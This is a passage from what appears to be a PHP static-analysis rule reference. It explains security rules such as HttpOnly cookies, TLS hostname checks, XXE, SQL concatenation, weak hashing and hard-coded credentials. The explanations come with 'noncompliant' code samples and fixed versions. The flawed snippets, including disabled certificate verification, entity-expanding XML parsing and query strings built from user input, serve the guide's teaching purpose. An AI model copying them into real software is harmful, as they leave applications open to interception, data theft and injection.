; open_basedir="${USER}/scripts/data"  Noncompliant; commented out

; php.ini try 2
open_basedir="/:${USER}/scripts/data"  ; Noncompliant; root directory in the list

Compliant solution

; php.ini try 1
open_basedir="${USER}/scripts/data"

Resources

php:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guaranties that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false and it’s up to the developer to decide whether or not the content of the cookie can be read by the client-side script. As a majority of Cross-Site Scripting (XSS) attacks target the theft of session-cookies, the HttpOnly attribute can help to reduce their impact as it won’t be possible to exploit the XSS vulnerability to steal session-cookies.

Ask Yourself Whether

  • the cookie is sensitive, used to authenticate the user, for instance a session-cookie
  • the HttpOnly attribute offer an additional protection (not the case for an XSRF-TOKEN cookie / CSRF token for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default the HttpOnly flag should be set to true for most of the cookies and it’s mandatory for session / sensitive-security cookies.

Sensitive Code Example

In php.ini you can specify the flags for the session cookie which is security-sensitive:

session.cookie_httponly = 0;  // Sensitive: this sensitive session cookie is created with the httponly flag set to false and so it can be stolen easily in case of XSS vulnerability

Same thing in PHP code:

session_set_cookie_params($lifetime, $path, $domain, true, false);  // Sensitive: this sensitive session cookie is created with the httponly flag (the fifth argument) set to false and so it can be stolen easily in case of XSS vulnerability

If you create a custom security-sensitive cookie in your PHP code:

$value = "sensitive data";
setcookie($name, $value, $expire, $path, $domain, true, false); // Sensitive: this sensitive cookie is created with the httponly flag (the seventh argument) set to false  and so it can be stolen easily in case of XSS vulnerability

By default setcookie and setrawcookie functions set httpOnly flag to false (the seventh argument) and so cookies can be stolen easily in case of XSS vulnerability:

$value = "sensitive data";
setcookie($name, $value, $expire, $path, $domain, true); // Sensitive: a sensitive cookie is created with the httponly flag  (the seventh argument) not defined (by default set to false)
setrawcookie($name, $value, $expire, $path, $domain, true); // Sensitive: a sensitive cookie is created with the httponly flag (the seventh argument) not defined  (by default set to false)

Compliant Solution

session.cookie_httponly = 1; // Compliant: the sensitive cookie is protected against theft thanks (cookie_httponly=1)
session_set_cookie_params($lifetime, $path, $domain, true, true); // Compliant: the sensitive cookie is protected against theft thanks to the fifth argument set to true (HttpOnly=true)
$value = "sensitive data";
setcookie($name, $value, $expire, $path, $domain, true, true); // Compliant: the sensitive cookie is protected against theft thanks to the seventh argument set to true (HttpOnly=true)
setrawcookie($name, $value, $expire, $path, $domain, true, true); // Compliant: the sensitive cookie is protected against theft thanks to the seventh argument set to true (HttpOnly=true)

See

php:S4784

This rule is deprecated; use S2631 instead.

Using regular expressions is security-sensitive. It has led in the past to the following vulnerabilities:

Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as /(a+)+s/ will take several seconds to evaluate the input string aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabs. The problem is that with every additional a character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular expression, a+s (without grouping) is efficiently evaluated in milliseconds and scales linearly with the input size.

Evaluating such regular expressions opens the door to Regular expression Denial of Service (ReDoS) attacks. In the context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the service inaccessible to genuine users.

This rule flags any execution of a hardcoded regular expression which has at least 3 characters and contains at at least two instances of any of the following characters *+{ .

Example: (a+)*

The following functions are detected as executing regular expressions:

Note that ereg* functions have been removed in PHP 7 and PHP 5 end of life date is the 1st of January 2019. Using PHP 5 is dangerous as there will be no security fix.

This rule’s goal is to guide security code reviews.

Ask Yourself Whether

  • the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
  • your regular expression engine performance decrease with specially crafted inputs and regular expressions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Do not set the constant pcre.backtrack_limit to a high value as it will increase the resource consumption of PCRE functions.

Check the error codes of PCRE functions via preg_last_error.

Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for vulnerability reports mentioning the one engine you’re are using. Do not run vulnerable regular expressions on user input.

Use if possible a library which is not vulnerable to Redos Attacks such as Google Re2.

Remember also that a ReDos attack is possible if a user-provided regular expression is executed. This rule won’t detect this kind of injection.

Avoid executing a user input string as a regular expression or use at least preg_quote to escape regular expression characters.

Exceptions

An issue will be created for the functions mb_ereg_search_pos, mb_ereg_search_regs and mb_ereg_search if and only if at least the first argument, i.e. the $pattern, is provided.

The current implementation does not follow variables. It will only detect regular expressions hard-coded directly in the function call.

$pattern = "/(a+)+/";
$result = eregi($pattern, $input);  // No issue will be raised even if it is Sensitive

Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: (a|aa)+, (a|a?)+.

It is a good idea to test your regular expression if it has the same pattern on both side of a "|".

See

php:S3331

This rule is deprecated, and will eventually be removed.

A cookie’s domain specifies which websites should be able to read it. Left blank, browsers are supposed to only send the cookie to sites that exactly match the sending domain. For example, if a cookie was set by lovely.dream.com, it should only be readable by that domain, and not by nightmare.com or even strange.dream.com. If you want to allow sub-domain access for a cookie, you can specify it by adding a dot in front of the cookie’s domain, like so: .dream.com. But cookie domains should always use at least two levels.

Cookie domains can be set either programmatically or via configuration. This rule raises an issue when any cookie domain is set with a single level, as in .com.

Ask Yourself Whether

  • the domain attribute has only one level as domain naming.

You are at risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • You should check the domain attribute has been set and its value has more than one level of domain nanimg, like: sonarsource.com

Sensitive Code Example

setcookie("TestCookie", $value, time()+3600, "/~path/", ".com", 1); // Noncompliant
session_set_cookie_params(3600, "/~path/", ".com"); // Noncompliant

// inside php.ini
session.cookie_domain=".com"; // Noncompliant

Compliant Solution

setcookie("TestCookie", $value, time()+3600, "/~path/", ".myDomain.com", 1);
session_set_cookie_params(3600, "/~path/", ".myDomain.com");

// inside php.ini
session.cookie_domain=".myDomain.com";

See

php:S3338

This rule is deprecated, and will eventually be removed.

Why is this an issue?

file_uploads is an on-by-default PHP configuration that allows files to be uploaded to your site. Since accepting candy files from strangers is inherently dangerous, this feature should be disabled unless it is absolutely necessary for your site.

This rule raises an issue when file_uploads is not explicitly disabled.

Noncompliant code example

; php.ini
file_uploads=1  ; Noncompliant

Compliant solution

; php.ini
file_uploads=0

Resources

php:S2255

This rule is deprecated, and will eventually be removed.

Using cookies is security-sensitive. It has led in the past to the following vulnerabilities:

Attackers can use widely-available tools to read cookies. Any sensitive information they may contain will be exposed.

This rule flags code that writes cookies.

Ask Yourself Whether

  • sensitive information is stored inside the cookie.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Cookies should only be used to manage the user session. The best practice is to keep all user-related information server-side and link them to the user session, never sending them to the client. In a very few corner cases, cookies can be used for non-sensitive information that need to live longer than the user session.

Do not try to encode sensitive information in a non human-readable format before writing them in a cookie. The encoding can be reverted and the original information will be exposed.

Using cookies only for session IDs doesn’t make them secure. Follow OWASP best practices when you configure your cookies.

As a side note, every information read from a cookie should be Sanitized.

Sensitive Code Example

$value = "1234 1234 1234 1234";

// Review this cookie as it seems to send sensitive information (credit card number).
setcookie("CreditCardNumber", $value, $expire, $path, $domain, true, true); // Sensitive
setrawcookie("CreditCardNumber", $value, $expire, $path, $domain, true, true); // Sensitive

See

php:S4433

Lightweight Directory Access Protocol (LDAP) servers provide two main authentication methods: the SASL and Simple ones. The Simple Authentication method also breaks down into three different mechanisms:

  • Anonymous Authentication
  • Unauthenticated Authentication
  • Name/Password Authentication

A server that accepts either the Anonymous or Unauthenticated mechanisms will accept connections from clients not providing credentials.

Why is this an issue?

When configured to accept the Anonymous or Unauthenticated authentication mechanism, an LDAP server will accept connections from clients that do not provide a password or other authentication credentials. Such users will be able to read or modify part or all of the data contained in the hosted directory.

What is the potential impact?

An attacker exploiting unauthenticated access to an LDAP server can access the data that is stored in the corresponding directory. The impact varies depending on the permission obtained on the directory and the type of data it stores.

Authentication bypass

If attackers get write access to the directory, they will be able to alter most of the data it stores. This might include sensitive technical data such as user passwords or asset configurations. Such an attack can typically lead to an authentication bypass on applications and systems that use the affected directory as an identity provider.

In such a case, all users configured in the directory might see their identity and privileges taken over.

Sensitive information leak

If attackers get read-only access to the directory, they will be able to read the data it stores. That data might include security-sensitive pieces of information.

Typically, attackers might get access to user account lists that they can use in further intrusion steps. For example, they could use such lists to perform password spraying, or related attacks, on all systems that rely on the affected directory as an identity provider.

If the directory contains some Personally Identifiable Information, an attacker accessing it might represent a violation of regulatory requirements in some countries. For example, this kind of security event would go against the European GDPR law.

How to fix it

Code examples

The following code indicates an anonymous LDAP authentication vulnerability because it binds to a remote server using an Anonymous Simple authentication mechanism.

Noncompliant code example

$ldapconn = ldap_connect("ldap.example.com");

if ($ldapconn) {
    $ldapbind = ldap_bind($ldapconn); // Noncompliant
}

Compliant solution

$ldaprdn  = 'uname';
$ldappass = 'password';

$ldapconn = ldap_connect("ldap.example.com");

if ($ldapconn) {
    $ldapbind = ldap_bind($ldapconn, $ldaprdn, $ldappass); // Compliant
}

Resources

Documentation

Standards

php:S5527

This vulnerability allows attackers to impersonate a trusted host.

Why is this an issue?

Transport Layer Security (TLS) provides secure communication between systems over the internet by encrypting the data sent between them. In this process, the role of hostname validation, combined with certificate validation, is to ensure that a system is indeed the one it claims to be, adding an extra layer of trust and security.

When hostname validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

To do so, an attacker would obtain a valid certificate authenticating example.com, serve it using a different hostname, and the application code would still accept it.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable hostname validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate hostnames, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

How to fix it in cURL

Code examples

The following code contains examples of disabled hostname validation.

The hostname validation gets disabled by setting CURLOPT_SSL_VERIFYHOST to 0 or false. To enable validation set the value to 2 or true or do not set CURLOPT_SSL_VERIFYHOST at all to use the secure default value.

Noncompliant code example

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, 'https://example.com/');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 0);  // Noncompliant
curl_exec($curl);
curl_close($curl);

Compliant solution

$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, 'https://example.com/');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, 2);
curl_exec($curl);
curl_close($curl);

How does this work?

To fix the vulnerability of disabled hostname validation, it is strongly recommended to first re-enable the default validation and fix the root cause: the validity of the certificate.

Use valid certificates

If a hostname validation failure prevents connecting to the target server, keep in mind that one system’s code should not work around another system’s problems, as this creates unnecessary dependencies and can lead to reliability issues.

Therefore, the first solution is to change the remote host’s certificate to match its identity. If the remote host is not under your control, consider replicating its service to a server whose certificate you can change yourself.

In case the contacted host is located on a development machine, and if there is no other choice, try following this solution:

  • Create a self-signed certificate for that machine.
  • Add this self-signed certificate to the system’s trust store.
  • If the hostname is not localhost, add the hostname in the /etc/hosts file.

Resources

Standards

php:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, SHA-3 are recommended, and for password hashing, it’s even better to use algorithms that do not compute too "quickly", like bcrypt, scrypt, argon2 or pbkdf2 because it slows down brute force attacks.

Sensitive Code Example

$hash = md5($data); // Sensitive
$hash = sha1($data);   // Sensitive

Compliant Solution

// for a password
$hash = password_hash($password, PASSWORD_BCRYPT); // Compliant

// other context
$hash = hash("sha512", $data);

See

php:S4792

Configuring loggers is security-sensitive. It has led in the past to the following vulnerabilities:

Logs are useful before, during and after a security incident.

  • Attackers will most of the time start their nefarious work by probing the system for vulnerabilities. Monitoring this activity and stopping it is the first step to prevent an attack from ever happening.
  • In case of a successful attack, logs should contain enough information to understand what damage an attacker may have inflicted.

Logs are also a target for attackers because they might contain sensitive information. Configuring loggers has an impact on the type of information logged and how they are logged.

This rule flags for review code that initiates loggers configuration. The goal is to guide security code reviews.

Ask Yourself Whether

  • unauthorized users might have access to the logs, either because they are stored in an insecure location or because the application gives access to them.
  • the logs contain sensitive information on a production server. This can happen when the logger is in debug mode.
  • the log can grow without limit. This can happen when additional information is written into logs every time a user performs an action and the user can perform the action as many times as he/she wants.
  • the logs do not contain enough information to understand the damage an attacker might have inflicted. The loggers mode (info, warn, error) might filter out important information. They might not print contextual information like the precise time of events or the server hostname.
  • the logs are only stored locally instead of being backuped or replicated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Check that your production deployment doesn’t have its loggers in "debug" mode as it might write sensitive information in logs.
  • Production logs should be stored in a secure location which is only accessible to system administrators.
  • Configure the loggers to display all warnings, info and error messages. Write relevant information such as the precise time of events and the hostname.
  • Choose log format which is easy to parse and process automatically. It is important to process logs rapidly in case of an attack so that the impact is known and limited.
  • Check that the permissions of the log files are correct. If you index the logs in some other service, make sure that the transfer and the service are secure too.
  • Add limits to the size of the logs and make sure that no user can fill the disk with logs. This can happen even when the user does not control the logged information. An attacker could just repeat a logged action many times.

Remember that configuring loggers properly doesn’t make them bullet-proof. Here is a list of recommendations explaining on how to use your logs:

  • Don’t log any sensitive information. This obviously includes passwords and credit card numbers but also any personal information such as user names, locations, etc…​ Usually any information which is protected by law is good candidate for removal.
  • Sanitize all user inputs before writing them in the logs. This includes checking its size, content, encoding, syntax, etc…​ As for any user input, validate using whitelists whenever possible. Enabling users to write what they want in your logs can have many impacts. It could for example use all your storage space or compromise your log indexing service.
  • Log enough information to monitor suspicious activities and evaluate the impact an attacker might have on your systems. Register events such as failed logins, successful logins, server side input validation failures, access denials and any important transaction.
  • Monitor the logs for any suspicious activity.

Sensitive Code Example

Basic PHP configuration:

function configure_logging() {
  error_reporting(E_RECOVERABLE_ERROR); // Sensitive
  error_reporting(32); // Sensitive

  ini_set('docref_root', '1'); // Sensitive
  ini_set('display_errors', '1'); // Sensitive
  ini_set('display_startup_errors', '1'); // Sensitive
  ini_set('error_log', "path/to/logfile"); // Sensitive - check logfile is secure
  ini_set('error_reporting', E_PARSE ); // Sensitive
  ini_set('error_reporting', 64); // Sensitive
  ini_set('log_errors', '0'); // Sensitive
  ini_set('log_errors_max_length', '512'); // Sensitive
  ini_set('ignore_repeated_errors', '1'); // Sensitive
  ini_set('ignore_repeated_source', '1'); // Sensitive
  ini_set('track_errors', '0'); // Sensitive

  ini_alter('docref_root', '1'); // Sensitive
  ini_alter('display_errors', '1'); // Sensitive
  ini_alter('display_startup_errors', '1'); // Sensitive
  ini_alter('error_log', "path/to/logfile"); // Sensitive - check logfile is secure
  ini_alter('error_reporting', E_PARSE ); // Sensitive
  ini_alter('error_reporting', 64); // Sensitive
  ini_alter('log_errors', '0'); // Sensitive
  ini_alter('log_errors_max_length', '512'); // Sensitive
  ini_alter('ignore_repeated_errors', '1'); // Sensitive
  ini_alter('ignore_repeated_source', '1'); // Sensitive
  ini_alter('track_errors', '0'); // Sensitive
}

Definition of custom loggers with psr/log

abstract class MyLogger implements \Psr\Log\LoggerInterface { // Sensitive
    // ...
}

abstract class MyLogger2 extends \Psr\Log\AbstractLogger { // Sensitive
    // ...
}

abstract class MyLogger3 {
    use \Psr\Log\LoggerTrait; // Sensitive
    // ...
}

Exceptions

No issue will be raised for logger configuration when it follows recommended settings for production servers. The following examples are all valid:

  ini_set('docref_root', '0');
  ini_set('display_errors', '0');
  ini_set('display_startup_errors', '0');

  error_reporting(0);
  ini_set('error_reporting', 0);

  ini_set('log_errors', '1');
  ini_set('log_errors_max_length', '0');
  ini_set('ignore_repeated_errors', '0');
  ini_set('ignore_repeated_source', '0');
  ini_set('track_errors', '1');

See

php:S5332

Clear-text protocols such as ftp, telnet, or http lack encryption of transported data, as well as the capability to build an authenticated connection. It means that an attacker able to sniff traffic from the network can read, modify, or corrupt the transported content. These protocols are not secure as they expose applications to an extensive range of risks:

  • sensitive data exposure
  • traffic redirected to a malicious endpoint
  • malware-infected software update or installer
  • execution of client-side code
  • corruption of critical information

Even in the context of isolated networks like offline environments or segmented cloud environments, the insider threat exists. Thus, attacks involving communications being sniffed or tampered with can still happen.

For example, attackers could successfully compromise prior security layers by:

  • bypassing isolation mechanisms
  • compromising a component of the network
  • getting the credentials of an internal IAM account (either from a service account or an actual person)

In such cases, encrypting communications would decrease the chances of attackers to successfully leak data or steal credentials from other network components. By layering various security practices (segmentation and encryption, for example), the application will follow the defense-in-depth principle.

Note that using the http protocol is being deprecated by major web browsers.

In the past, it has led to the following vulnerabilities:

Ask Yourself Whether

  • Application data needs to be protected against falsifications or leaks when transiting over the network.
  • Application data transits over an untrusted network.
  • Compliance rules require the service to encrypt data in transit.
  • Your application renders web pages with a relaxed mixed content policy.
  • OS-level protections against clear-text traffic are deactivated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Make application data transit over a secure, authenticated and encrypted protocol like TLS or SSH. Here are a few alternatives to the most common clear-text protocols:
    • Use ssh as an alternative to telnet.
    • Use sftp, scp, or ftps instead of ftp.
    • Use https instead of http.
    • Use SMTP over SSL/TLS or SMTP with STARTTLS instead of clear-text SMTP.
  • Enable encryption of cloud components communications whenever it is possible.
  • Configure your application to block mixed content when rendering web pages.
  • If available, enforce OS-level deactivation of all clear-text traffic.

It is recommended to secure all transport channels, even on local networks, as it can take a single non-secure connection to compromise an entire application or system.

Sensitive Code Example

$url = "http://example.com"; // Sensitive
$url = "ftp://anonymous@example.com"; // Sensitive
$url = "telnet://anonymous@example.com"; // Sensitive

$con = ftp_connect('example.com'); // Sensitive

$trans = (new Swift_SmtpTransport('XXX', 1234)); // Sensitive

$mailer = new PHPMailer(true); // Sensitive

define( 'FORCE_SSL_ADMIN', false); // Sensitive
define( 'FORCE_SSL_LOGIN', false); // Sensitive

Compliant Solution

$url = "https://example.com";
$url = "sftp://anonymous@example.com";
$url = "ssh://anonymous@example.com";

$con = ftp_ssl_connect('example.com');

$trans = (new Swift_SmtpTransport('smtp.example.org', 1234))
  ->setEncryption('tls')
;

$mailer = new PHPMailer(true);
$mailer->SMTPSecure = 'tls';

define( 'FORCE_SSL_ADMIN', true);
define( 'FORCE_SSL_LOGIN', true);

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Insecure protocol scheme followed by loopback addresses like 127.0.0.1 or localhost.

See

php:S2068

Because it is easy to extract strings from an application source code or binary, credentials should not be hard-coded. This is particularly true for applications that are distributed or that are open-source.

In the past, it has led to the following vulnerabilities:

Credentials should be stored outside of the code in a configuration file, a database, or a management service for secrets.

This rule flags instances of hard-coded credentials used in database and LDAP connections. It looks for hard-coded credentials in connection strings, and for variable names that match any of the patterns from the provided list.

It’s recommended to customize the configuration of this rule with additional credential words such as "oauthToken", "secret", …​

Ask Yourself Whether

  • Credentials allow access to a sensitive component like a database, a file storage, an API or a service.
  • Credentials are used in production environments.
  • Application re-distribution is required before updating the credentials.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Store the credentials in a configuration file that is not pushed to the code repository.
  • Store the credentials in a database.
  • Use your cloud provider’s service for managing secrets.
  • If a password has been disclosed through the source code: change it.

Sensitive Code Example

$password = "65DBGgwe4uazdWQA"; // Sensitive

$httpUrl = "https://example.domain?user=user&password=65DBGgwe4uazdWQA" // Sensitive
$sshUrl = "ssh://user:65DBGgwe4uazdWQA@example.domain" // Sensitive

Compliant Solution

$user = getUser();
$password = getPassword(); // Compliant

$httpUrl = "https://example.domain?user=$user&password=$password" // Compliant
$sshUrl = "ssh://$user:$password@example.domain" // Compliant

See

php:S5693

Rejecting requests with significant content length is a good practice to control the network traffic intensity and thus resource consumption in order to prevents DoS attacks.

Ask Yourself Whether

  • size limits are not defined for the different resources of the web application.
  • the web application is not protected by rate limiting features.
  • the web application infrastructure has limited resources.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • For most of the features of an application, it is recommended to limit the size of requests to:
    • lower or equal to 8mb for file uploads.
    • lower or equal to 2mb for other requests.

It is recommended to customize the rule with the limit values that correspond to the web application.

Sensitive Code Example

For Symfony Constraints:

use Symfony\Component\Validator\Constraints as Assert;
use Symfony\Component\Validator\Mapping\ClassMetadata;

class TestEntity
{
    public static function loadValidatorMetadata(ClassMetadata $metadata)
    {
        $metadata->addPropertyConstraint('upload', new Assert\File([
            'maxSize' => '100M', // Sensitive
        ]));
    }
}

For Laravel Validator:

use App\Http\Controllers\Controller;
use Illuminate\Http\Request;

class TestController extends Controller
{
    public function test(Request $request)
    {
        $validatedData = $request->validate([
            'upload' => 'required|file', // Sensitive
        ]);
    }
}

Compliant Solution

For Symfony Constraints:

use Symfony\Component\Validator\Constraints as Assert;
use Symfony\Component\Validator\Mapping\ClassMetadata;

class TestEntity
{
    public static function loadValidatorMetadata(ClassMetadata $metadata)
    {
        $metadata->addPropertyConstraint('upload', new Assert\File([
            'maxSize' => '8M', // Compliant
        ]));
    }
}

For Laravel Validator:

use App\Http\Controllers\Controller;
use Illuminate\Http\Request;

class TestController extends Controller
{
    public function test(Request $request)
    {
        $validatedData = $request->validate([
            'upload' => 'required|file|max:8000', // Compliant
        ]);
    }
}

See

php:S6437

Why is this an issue?

A hard-coded secret has been found in your code. You should quickly list where this secret is used, revoke it, and then change it in every system that uses it.

Passwords, secrets, and any type of credentials should only be used to authenticate a single entity (a person or a system).

If you allow third parties to authenticate as another system or person, they can impersonate legitimate identities and undermine trust within the organization.
It does not matter if the impersonation is malicious: In either case, it is a clear breach of trust in the system, as the systems involved falsely assume that the authenticated entity is who it claims to be.
The consequences can be catastrophic.

Keeping credentials in plain text in a code base is tantamount to sharing that password with anyone who has access to the source code and runtime servers.
Thus, it is a breach of trust, as these individuals have the ability to impersonate others.

Secret management services are the most efficient tools to store credentials and protect the identities associated with them.
Cloud providers and on-premise services can be used for this purpose.

If storing credentials in a secret data management service is not possible, follow these guidelines:

  • Do not store credentials in a file that an excessive number of people can access.
    • For example, not in code, not in a spreadsheet, not on a sticky note, and not on a shared drive.
  • Use the production operating system to protect password access control.
    • For example, in a file whose permissions are restricted and protected with chmod and chown.

Noncompliant code example

use Defuse\Crypto\KeyOrPassword;

function createKey() {
    $password = "example";
    return KeyOrPassword::createFromPassword($password); // Noncompliant
}

Compliant solution

Modern web frameworks tend to provide a secure way to pass passwords and secrets to the code. For example, in Symfony you can use vaults to store your secrets. The secret values are referenced in the same way as environment variables, so you can easily access them through configuration parameters.

use Defuse\Crypto\KeyOrPassword;

class PasswordService
{
    private string $password;

    public function setPassword(string $password): void
    {
        $this->password = $password;
    }

    public function createKey(): KeyOrPassword
    {
        return KeyOrPassword::createFromPassword($this->password);
    }
}

Resources

php:S2077

Formatted SQL queries can be difficult to maintain, debug and can increase the risk of SQL injection when concatenating untrusted values into the query. However, this rule doesn’t detect SQL injections (unlike rule S3649), the goal is only to highlight complex/formatted queries.

Ask Yourself Whether

  • Some parts of the query come from untrusted values (like user inputs).
  • The query is repeated/duplicated in other parts of the code.
  • The application must support different types of relational databases.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Sensitive Code Example

$id = $_GET['id'];
mysql_connect('localhost', $username, $password) or die('Could not connect: ' . mysql_error());
mysql_select_db('myDatabase') or die('Could not select database');

$result = mysql_query("SELECT * FROM myTable WHERE id = " . $id);  // Sensitive, could be susceptible to SQL injection

while ($row = mysql_fetch_object($result)) {
    echo $row->name;
}

Compliant Solution

$id = $_GET['id'];
try {
    $conn = new PDO('mysql:host=localhost;dbname=myDatabase', $username, $password);
    $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

    $stmt = $conn->prepare('SELECT * FROM myTable WHERE id = :id');
    $stmt->execute(array('id' => $id));

    while($row = $stmt->fetch(PDO::FETCH_OBJ)) {
        echo $row->name;
    }
} catch(PDOException $e) {
    echo 'ERROR: ' . $e->getMessage();
}

Exceptions

No issue will be raised if one of the functions is called with hard-coded string (no concatenation) and this string does not contain a "$" sign.

$result = mysql_query("SELECT * FROM myTable WHERE id = 42") or die('Query failed: ' . mysql_error());  // Compliant

The current implementation does not follow variables. It will only detect SQL queries which are concatenated or contain a $ sign directly in the function call.

$query = "SELECT * FROM myTable WHERE id = " . $id;
$result = mysql_query($query);  // No issue will be raised even if it is Sensitive

See

php:S4818

This rule is deprecated, and will eventually be removed.

Using sockets is security-sensitive. It has led in the past to the following vulnerabilities:

Sockets are vulnerable in multiple ways:

  • They enable a software to interact with the outside world. As this world is full of attackers it is necessary to check that they cannot receive sensitive information or inject dangerous input.
  • The number of sockets is limited and can be exhausted. Which makes the application unresponsive to users who need additional sockets.

This rules flags code that creates sockets. It matches only the direct use of sockets, not use through frameworks or high-level APIs such as the use of http connections.

Ask Yourself Whether

  • sockets are created without any limit every time a user performs an action.
  • input received from sockets is used without being sanitized.
  • sensitive data is sent via sockets without being encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • In many cases there is no need to open a socket yourself. Use instead libraries and existing protocols.
  • Encrypt all data sent if it is sensitive. Usually it is better to encrypt it even if the data is not sensitive as it might change later.
  • Sanitize any input read from the socket.
  • Limit the number of sockets a given user can create. Close the sockets as soon as possible.

Sensitive Code Example

function handle_sockets($domain, $type, $protocol, $port, $backlog, $addr, $hostname, $local_socket, $remote_socket, $fd) {
    socket_create($domain, $type, $protocol); // Sensitive
    socket_create_listen($port, $backlog); // Sensitive
    socket_addrinfo_bind($addr); // Sensitive
    socket_addrinfo_connect($addr); // Sensitive
    socket_create_pair($domain, $type, $protocol, $fd);

    fsockopen($hostname); // Sensitive
    pfsockopen($hostname); // Sensitive
    stream_socket_server($local_socket); // Sensitive
    stream_socket_client($remote_socket); // Sensitive
    stream_socket_pair($domain, $type, $protocol); // Sensitive
}

See

php:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in Core PHP

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

$xml = file_get_contents('xxe.xml');
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT); // Noncompliant
$doc = new DOMDocument();
$doc->load('xxe.xml', LIBXML_NOENT); // Noncompliant
$reader = new XMLReader();
$reader->open('xxe.xml');
$reader->setParserProperty(XMLReader::SUBST_ENTITIES, true); // Noncompliant

Compliant solution

External entity substitution is disabled by default in simplexml_load_string() and DOMDocument::open().

$xml = file_get_contents('xxe.xml');
$doc = simplexml_load_string($xml, 'SimpleXMLElement');
$doc = new DOMDocument();
$doc->load('xxe.xml');
$reader = new XMLReader();
$reader->open('xxe.xml');
$reader->setParserProperty(XMLReader::SUBST_ENTITIES, false);

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.

Resources

Standards

php:S2070

This rule is deprecated; use S4790 instead.

Why is this an issue?

The MD5 algorithm and its successor, SHA-1, are no longer considered secure, because it is too easy to create hash collisions with them. That is, it takes too little computational effort to come up with a different input that produces the same MD5 or SHA-1 hash, and using the new, same-hash value gives an attacker the same access as if he had the originally-hashed value. This applies as well to the other Message-Digest algorithms: MD2, MD4, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160.

Consider using safer alternatives, such as SHA-256, SHA-512 or SHA-3.

Noncompliant code example

$password = ...

if (md5($password) === '1f3870be274f6c49b3e31a0c6728957f') { // Noncompliant; md5() hashing algorithm is not secure for password management
   [...]
}

if (sha1($password) === 'd0be2dc421be4fcd0172e5afceea3970e2f3d940') { // Noncompliant; sha1() hashing algorithm is not secure for password management
   [...]
}

Resources

php:S2964

This rule is deprecated, and will eventually be removed.

Why is this an issue?

